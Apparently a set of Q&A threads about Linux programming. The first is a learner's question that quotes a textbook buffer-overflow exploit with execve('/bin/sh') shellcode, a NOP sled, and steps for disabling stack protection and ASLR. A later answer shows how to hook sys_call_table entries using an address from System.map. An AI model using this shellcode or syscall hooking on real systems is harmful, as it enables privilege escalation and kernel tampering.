I'm running 32-bit Ubuntu 11.04 on a 2007 MacBook, and I'm just starting to learn about buffer overflow exploits. I'm trying to run the example programs from a book, but Ubuntu's security measures are making it impossible for me to successfully execute a buffer overflow. Here's the code I'm attempting to run:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // zero out the new memory
strcpy(command, "./notesearch \'"); // start command buffer
buffer = command + strlen(command); // set buffer at the end
if(argc > 1) // set offset
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // set return address
for(i=0; i < 160; i+=4) // fill buffer with return address
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // build NOP sled
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // run exploit
free(command);
}
I would like this code to result in a segfault, but every time I run it, it quits with the error "stack smashing detected". I've tried compiling (using gcc) with the following options:
-fno-stack-protector -D_FORTIFY_SOURCE=0 -z execstack
in various combinations, as well as all together. I've also tried $ sysctl -w kernel.randomize_va_space=0 followed by a recompile, with no success.
It would be much appreciated if anyone could shed light on the correct way to execute a buffer overflow, given Ubuntu's built-in security measures
I'm a bit more informed on what's going on now. The given code constructs a buffer and then passes it to a program called notesearch that has a buffer overflow vulnerability. I didn't figure out how to disable the protective measures on the current version of ubuntu, but the methods I tried do work on my Ubuntu 9.10 virtual machine. That is, -fno-stack-protector works as a gcc flag, and when paired with sysctl kernel.randomize_va_space=0, buffer overflows that execute shellcode on the stack are permitted. A bit of a workaround, but running my VM suits me well and allows me to continue through the examples in this book. It's a great book if you're interested in learning exploits. Here it is
Are you sure you're passing -fno-stack-protector to the right gcc invocation? The given code doesn't appear to have a buffer overflow.
Related
I was wondering if there is a way to capture (in other words observe) vDSO calls like gettimeofday in strace.
Also, is there a way to execute a binary without loading linux-vdso.so.1 (a flag or env variable)?
And lastly, what if I write a program that delete the linux-vdso.so.1 address from the auxiliary vector and then execve my program? Has anyone ever tried that?
You can capture calls to system calls which have been implemented via the vDSO by using ltrace instead of strace. This is because calls to system calls implemented via the vDSO work differently than "normal" system calls and the method strace uses to trace system calls does not work with vDSO-implemented system calls. To learn more about how strace works, check out this blog post I wrote about strace. And, to learn more about how ltrace works, check out this other blog post I wrote about ltrace.
No, it is not possible to execute a binary without loading linux-vdso.so.1. At least, not on my version of libc on Ubuntu precise. It is certainly possible that newer versions of libc/eglibc/etc have added this as a feature but it seems very unlikely. See the next answer for why.
If you delete the address from the auxillary vector, your binary will probably crash. libc has a piece of code which will first attempt to walk the vDSO ELF object, and if this fails, will fall back to a hardcoded vsyscall address. The only way it will avoid this is if you've compiled glibc with the vDSO disabled.
There is another workaround, though, if you really, really don't want to use the vDSO. You can try using glibc's syscall function and pass in the syscall number for gettimeofday. This will force glibc to call gettimeofday via the kernel instead of the vDSO.
I've included a sample program below illustrating this. You can read more about how system calls work by reading my syscall blog post.
#include <sys/time.h>
#include <stdio.h>
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/syscall.h>
int
main(int argc, char *argv[]) {
struct timeval tv;
syscall(SYS_gettimeofday, &tv);
return 0;
}
Compile with gcc -o test test.c and strace with strace -ttTf ./test 2>&1 | grep gettimeofday:
09:57:32.651876 gettimeofday({1467305852, 651888}, {420, 140735905220705}) = 0 <0.000006>
Background
We have been trying unsuccessfully to use the new GCC 5.1 release to offload OpenMP blocks to the Intel MIC (i.e. the Xeon Phi). Following the GCC Offloading page, we've put together the build.sh script to build the "accel" target compiler for "intelmic" and the host compiler. The compilation appears to complete successfully.
Using the env.sh script we then attempt to compile the simple hello.c program listed below. However, this program seems to only run on the host and not the target device.
As we are new to offloading in general, as well as compiling GCC, there are multiple things we could be doing incorrectly. However, we've investigated the resources already mentioned plus the following (I do not have enough rep to post the links):
Offloading for Xeon Phi
Xeon Phi Tutorial
Intel Xeon Phi Offload Programming Models
The biggest problem is they usually reference the Intel compiler. While we plan to purchase a copy, we do NOT currently have a copy. In addition, the majority of our development pipeline is already integrated with GCC and we'd prefer to keep it that way (if possible).
We have installed the latest MPSS 3.5 distribution, making the necessary modifications to work under Ubuntu. We can successfully communicate and check the status of the Xeon Phis in our system.
In our efforts, we never saw any indication that the code was running in the mic emulation mode either.
Questions
Has anyone successfully built a host/target GCC compiler combination that actually offloads to the Xeon Phi? If so, what resources did you use?
Are we missing anything in the build script?
Is there anything wrong with the test source code? They compile with no errors (except what is mentioned below) and run with 48 threads (i.e. the number of logical threads in the host system).
Since Google search does not reveal much, does anyone have suggestions for the next step (besides giving up on GCC offloading)? Is this a bug?
Thanks!
build.sh
#!/usr/bin/env bash
set -e -x
unset LIBRARY_PATH
GCC_DIST=$PWD/gcc-5.1.0
# Modify these to control where the compilers are installed
TARGET_PREFIX=$HOME/gcc
HOST_PREFIX=$HOME/gcc
TARGET_BUILD=/tmp/gcc-build-mic
HOST_BUILD=/tmp/gcc-build-host
# i dropped the emul since we are not planning to emulate!
TARGET=x86_64-intelmic-linux-gnu
# should this be a quad (i.e. pc)?? default (Ubuntu) build seems to be x86_64-linux-gnu
HOST=x86_64-pc-linux-gnu
# check for the GCC distribution
if [ ! -d $GCC_DIST ]; then
echo "gcc-5.1.0 distribution should be here $PWD"
exit 0
fi
#sudo apt-get install -y libmpfr-dev libgmp-dev libmpc-dev libisl-dev dejagnu autogen sysvbanner
# prepare and configure the target compiler
mkdir -p $TARGET_BUILD
pushd $TARGET_BUILD
$GCC_DIST/configure \
--prefix=$TARGET_PREFIX \
--enable-languages=c,c++,fortran,lto \
--enable-liboffloadmic=target \
--disable-multilib \
--build=$TARGET \
--host=$TARGET \
--target=$TARGET \
--enable-as-accelerator-for=$HOST \
--program-prefix="${TARGET}-"
#--program-prefix="$HOST-accel-$TARGET-" \
# try adding the program prefix as HINTED in the https://gcc.gnu.org/wiki/Offloading
# do we need to specify a sysroot??? Wiki says we don't need one... but it also says "better to configure as cross compiler....
# build and install
make -j48 && make install
popd
# prepare and build the host compiler
mkdir -p $HOST_BUILD
pushd $HOST_BUILD
$GCC_DIST/configure \
--prefix=$HOST_PREFIX \
--enable-languages=c,c++,fortran,lto \
--enable-liboffloadmic=host \
--disable-multilib \
--build=$HOST \
--host=$HOST \
--target=$HOST \
--enable-offload-targets=$TARGET=$TARGET_PREFIX
make -j48 && make install
popd
env.sh
#!/usr/bin/env bash
TARGET_PREFIX=$HOME/gcc
HOST_PREFIX=$HOME/gcc
HOST=x86_64-pc-linux-gnu
VERSION=5.1.0
export LD_LIBRARY_PATH=/opt/intel/mic/coi/host-linux-release/lib:/opt/mpss/3.4.3/sysroots/k1om-mpss-linux/usr/lib64:$LD_LIBRARY_PATH
export LD_LIBRARY_PATH=$HOST_PREFIX/lib:$HOST_PREFIX/lib64:$HOST_PREFIX/lib/gcc/$HOST/$VERSION:$LD_LIBRARY_PATH
export PATH=$HOST_PREFIX/bin:$PATH
hello.c (version 1)
#include <omp.h>
#include <stdio.h>
#include <stdlib.h>
int main (int argc, char *argv[])
{
int nthreads, tid;
/* Fork a team of threads giving them their own copies of variables */
#pragma offload target (mic)
{
#pragma omp parallel private(nthreads,tid)
{
/* Obtain thread number */
tid = omp_get_thread_num();
printf("Hello World from thread = %d\n", tid);
/* Only master thread does this */
if (tid == 0) {
nthreads = omp_get_num_threads();
printf("Number of threads = %d\n", nthreads);
}
#ifdef __MIC__
printf("on target...\n");
#else
printf("on host...\n");
#endif
}
}
}
We compiled this code with:
gcc -fopenmp -foffload=x86_64-intelmic-linux-gnu hello.c -o hello
hello_omp.c (version 2)
#include <omp.h>
#include <stdio.h>
#include <stdlib.h>
int main (int argc, char *argv[])
{
int nthreads, tid;
/* Fork a team of threads giving them their own copies of variables */
#pragma omp target device(mic)
{
#pragma omp parallel private(nthreads,tid)
{
/* Obtain thread number */
tid = omp_get_thread_num();
printf("Hello World from thread = %d\n", tid);
/* Only master thread does this */
if (tid == 0) {
nthreads = omp_get_num_threads();
printf("Number of threads = %d\n", nthreads);
}
#ifdef __MIC__
printf("on target...\n");
#else
printf("on host...\n");
#endif
}
}
}
Almost the same thing, but instead we tried the
#pragma omp target device
syntax. In fact, with mic, it complains, but with any device numbers (i.e. 0) it compiles and runs on the host. This code was compiled in the same manner.
Offloading to Xeon Phi with GCC 5 is possible. In order to get it to work, one must compile liboffloadmic for native MIC target, similarly to how it is done here. The problem of your setup is that it compiles host emulation libraries (libcoi_host.so, libcoi_device.so), and sticks with emulated offloading even though the physical Xeon Phi is present.
In case core-dump is not generated(due to any possible reason). And I want to know back trace (execution sequence of instructions). How Can I do that?
As /proc/pid/maps stores the memory map of a process.
Is there any file in linux which stores userspace or kernel space of a process?(May be I'm using wrong words to express)
I mean to say all address by address sequence of execution of instructions.
To see what the kernel stack for a process looks like at the present time:
sudo cat /proc/PID/stack
If you want to see the user stack for a process, and can get to it while it is still running (even if it is stuck waiting for a system call to return), run gdb and attach to it using its PID. Then use the backtrace command. This will be much more informative if the program was compiled with debug symbols.
If you want backtrace to be printed in Linux kernel use dump_stack()
If you want backtrace to be printed in user-level C code, implement something like this
#include <stdlib.h>
#include <stdio.h>
#include <execinfo.h>
#define BACKTRACE_SIZ 64
void show_backtrace (void)
{
void *array[BACKTRACE_SIZ];
size_t size, i;
char **strings;
size = backtrace(array, BACKTRACE_SIZ);
strings = backtrace_symbols(array, size);
for (i = 0; i < size; i++) {
printf("%p : %s\n", array[i], strings[i]);
}
free(strings); // malloced by backtrace_symbols
}
And then compile the code with -funwind-tables flag and link with -rdynamic
As told in http://www.stlinux.com/devel/debug/backtrace
For educational purposes, I want to implement a system call in Debian Wheezy. I wish to implement it on the kernel that comes in the linux-image-3.2.0--rt-amd64 package. Here is an overview of what I have tried:
To get the kernel source:
apt-get source linux-image-3.2.0-4-rt-amd64
From that, I get the following files/directories the directory I executed in:
linux_3.2.41.orig.tar.xz
linux_3.2.41-2+deb7u2.dsc
linux_3.2.41-2+deb7u2.debian.tar.xz
as well as:
linux_3.2.41
which contains the source code for the kernel.
Then, to make the necessary changes in order to add the system call, I basically followed this page:
How to write system calls on debian/ubuntu
The following is a condensed version of the instructions given there modified to reflect the changes I made.
+File 1: linux-x.x.x/vpart_syscalls/vpart_syscalls.c
#include <linux/linkage.h>
#include <linux/kernel.h>
asmlinkage long insert_partition(char*dest, const char* src)
{
printk("<--- the syscall has been called!");
return 0;
}
File 2: linux-x.x.x/vpart_syscalls/Makefile. Create a Makefile within the same test directory you created above and put this line in it:
obj-y := vpart_syscalls.o
File 3: linux-x.x.x/arch/x86/kernel/syscall_table_32.S. Now, you have to add your system call to the system call table. Append to the file the following line:
.long insert_partition
File 4: linux-x.x.x/arch/x86/include/asm/unistd_32.h
In this file, the names of all the system calls will be associated with a unique number. After the last system call-number pair, add a line
#define __NR_insert_partition 349
Then replace NR_syscalls value, stating total number of system calls with (the existing number incremented by 1) i.e. in this case the NR_syscalls should've been 338 and the new value is 339.
#define NR_syscalls 350
File 5: linux-x.x.x/include/linux/syscalls.h
Append to the file the prototype of our function.
asmlinkage long insert_partition(int lenTicks, int vpid);
just before the #endif line in the file.
File 6: Makefile at the root of source directory.
Open Makefile and find the line where core-y is defined and add the directory test to the end of that line.
core-y += kernel/ mm/ fs/ test/ vpart_syscalls/
I then proceeded to build the kernel in a different fashion than is described there:
make localmodconfig
make menuconfig (making no changes)
make-kpkg clean
fakeroot make-kpkg --initrd --append-to-version=+tm kernel_image kernel_headers
cd ..
dpkg -i linux-image-3.8.*
dpkg -i linux-headers-3.8.*
The kernel that is installed boots fine. I made the following c program to test the syscall:
#include <stdio.h>
#include <linux/unistd.h>
#include <sys/syscall.h>
int main(){
printk("Calling the new syscall!\n");
int ret = 100;
ret = syscall(349, 1, 2);
printf("call return value: %i\n", ret);
return 0;
}
When I compile and run this program, I get a return value of -1. I check the messages using dmesg and there is no evidence of my printk being called..
If anyone knows where my problem is I would be really really happy! I should say I am not too experienced at changing and building the kernel, but I have learned a lot about it. I read Robert Loves book - linux kernel development and several guides on the webs.
I think, the steps 3 and 4 may be incorrect for 64-bit kernels:
File 3: linux-x.x.x/arch/x86/kernel/syscall_table_32.S.
File 4: linux-x.x.x/arch/x86/include/asm/unistd_32.h
There are two files here: http://lxr.linux.no/linux+v3.2.41/arch/x86/kernel/
syscall_64.c 668 2008-12-24 14:26:58 -0800
syscall_table_32.S 8659 2012-01-04 14:55:50 -0800
First one defines syscall table contents for 64-bit mode using C file and macro-cheating with unistd_64.h
#define __SYSCALL(nr, sym) [nr] = sym,
const sys_call_ptr_t sys_call_table[__NR_syscall_max+1] = {
....
#include <asm/unistd_64.h>
};
Where asm/unistd_64.h is
#define __NR_read 0
__SYSCALL(__NR_read, sys_read)
and so on.
And second one, which you changed - is for 32-bit mode and written using asm file and labels (.long sys_call_name).
So, you defined syscall for 32-bit mode and you are using linux-image-3.2.0-4-rt-amd64 which is basically for " 64-bit PCs".
I think you compiled your test program as gcc test.c, which defaults to 64-bit mode. You can try -m32 option of gcc: gcc -m32 test.c to get 32-bit application (this will only work if you have correct cross environment for 32-bit builds) or compile this test on some 32-bit linux.
Or the other choice is to make step "4a": edit arch/x86/include/asm/unistd_64.h to add two lines:
#define __NR_insert_partition YOUR_NUMBER
__SYSCALL(__NR_insert_partition, insert_partition)
I'm not sure where and how NR_syscalls for 64bit is defined. It may be generated during build.
I am trying to set the sys exit call to a variable by
extern void *sys_call_table[];
real_sys_exit = sys_call_table[__NR_exit]
however, when I try to make, the console gives me the error
error: ‘__NR_exit’ undeclared (first use in this function)
Any tips would be appreciated :) Thank you
Since you are in kernel 2.6.x , sys_call_table isnt exported any more.
If you want to avoid the compilation error try this include
#include<linux/unistd.h>
however, It will not work. So the work around to "play" with the sys_call_table is to find the address of sys_call_table in SystemXXXX.map (located at /boot) with this command:
grep sys_call System.map-2.6.X -i
this will give the addres, then this code should allow you to modify the table:
unsigned long *sys_call_table;
sys_call_table = (unsigned long *) simple_strtoul("0xc0318500",NULL,16);
original_mkdir = sys_call_table[__NR_mkdir];
sys_call_table[__NR_mkdir] = mkdir_modificado;
Hope it works for you, I have just tested it under kernel 2.6.24, so should work for 2.6.18
also check here, Its a very good
http://commons.oreilly.com/wiki/index.php/Network_Security_Tools/Modifying_and_Hacking_Security_Tools/Fun_with_Linux_Kernel_Modules
If you haven't included the file syscall.h, you should do that ahead of the reference to __NR_exit. For example,
#include <syscall.h>
#include <stdio.h>
int main()
{
printf("%d\n", __NR_exit);
return 0;
}
which returns:
$ cc t.c
$ ./a.out
60
Some other observations:
If you've already included the file, the usual reasons __NR_exit wouldn't be defined are that the definition was being ignored due to conditional compilation (#ifdef or #ifndef at work somewhere) or because it's being removed elsewhere through a #undef.
If you're writing the code for kernel space, you have a completely different set of headers to use. LXR (http://lxr.linux.no/linux) searchable, browsable archive of the kernel source is a helpful resource.